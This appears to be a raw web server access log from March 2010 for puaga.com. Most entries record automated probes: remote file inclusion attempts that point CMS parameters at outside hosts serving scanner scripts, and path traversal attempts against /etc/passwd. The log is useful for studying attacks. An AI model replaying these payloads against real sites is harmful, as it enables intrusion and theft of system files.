193.111.95.42 - - [03/Mar/2010:04:00:17 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:00:17 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
67.225.243.237 - - [03/Mar/2010:04:00:37 -0800] "GET /index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [03/Mar/2010:04:00:37 -0800] "GET /logs/access_100213.log/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [03/Mar/2010:04:00:38 -0800] "GET /logs/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:01:34 -0800] "GET /logs/shop.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:01:35 -0800] "GET /shop.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:01:35 -0800] "GET /logs/access_100207.log/shop.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [03/Mar/2010:04:01:43 -0800] "GET /zb//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [03/Mar/2010:04:01:44 -0800] "GET /logs//zb//bbs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:20 -0800] "GET /administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:20 -0800] "GET /logs/access_091109.log/administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:20 -0800] "GET /logs/administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.243.237 - - [03/Mar/2010:04:02:26 -0800] "GET /logs/access_100130.log/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:29 -0800] "GET /logs/access_091109.log/administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:29 -0800] "GET /logs/administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:29 -0800] "GET /administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:35 -0800] "GET /administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:35 -0800] "GET /logs/access_091109.log/administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [03/Mar/2010:04:02:38 -0800] "GET /logs/administrator/components/help.mgm.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:47 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:47 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:47 -0800] "GET /logs/access_100211.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:52 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:52 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:52 -0800] "GET /logs/access_100211.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:52 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:02:56 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:04:16 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:04:17 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:04:04:17 -0800] "GET /logs/access_091221.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:05 -0800] "GET /logs/access_100126.log%20%20/playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:05 -0800] "GET /playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:05 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:09 -0800] "GET /playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:09 -0800] "GET /logs/access_100126.log%20%20/playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:09 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:09 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:04:05:13 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:05:56 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:05:56 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:05:56 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.243.237 - - [03/Mar/2010:04:05:56 -0800] "GET /logs/access_100218.log%20/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:05:57 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:05:57 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:05:57 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:06:11 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:06:11 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_extcalendar/admin_settings.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:07:56 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:07:56 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:09:25 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:09:25 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:09:26 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:09:55 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:09:55 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:10:03 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:10:04 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:10:04 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:15 -0800] "GET /bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:15 -0800] "GET /logs/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:15 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:17 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:17 -0800] "GET /bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:18 -0800] "GET /logs/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:18 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:10:19 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.7.103 - - [03/Mar/2010:04:10:57 -0800] "GET /ideal/forum/viewtopic.php?p=26224 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
91.121.25.16 - - [03/Mar/2010:04:11:22 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:11:24 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:11:27 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:11:31 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:11:32 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:13:33 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:13:33 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:13:33 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:13:33 -0800] "GET /logs/access_100217.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:13:33 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:15:00 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:15:49 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:15:49 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:15:50 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [03/Mar/2010:04:16:53 -0800] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [03/Mar/2010:04:16:53 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [03/Mar/2010:04:16:53 -0800] "GET /logs/access_100129.log%20%20/modules/agendax/addevent.inc.php?agendax_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:17:12 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:17:12 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:17:14 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:19:27 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:19:28 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:19:48 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:19:48 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:19:48 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:21:02 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:21:03 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:21:03 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [03/Mar/2010:04:22:05 -0800] "GET /orange_g/forum/viewtopic.php?p=26906 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [03/Mar/2010:04:22:06 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/orange_g/forum/viewtopic.php?p=26906" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [03/Mar/2010:04:22:06 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/orange_g/forum/viewtopic.php?p=26906" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
218.208.78.90 - - [03/Mar/2010:04:22:26 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:22:28 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:22:28 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:22:29 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:23:00 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:23:00 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:23:00 -0800] "GET /logs/access_100217.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:23:21 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:23:22 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:24:59 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:04:26:06 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:26:11 -0800] "GET /logs/access_100222.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [03/Mar/2010:04:26:11 -0800] "GET /logs/access_100129.log/modules/agendax/addevent.inc.php?agendax_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
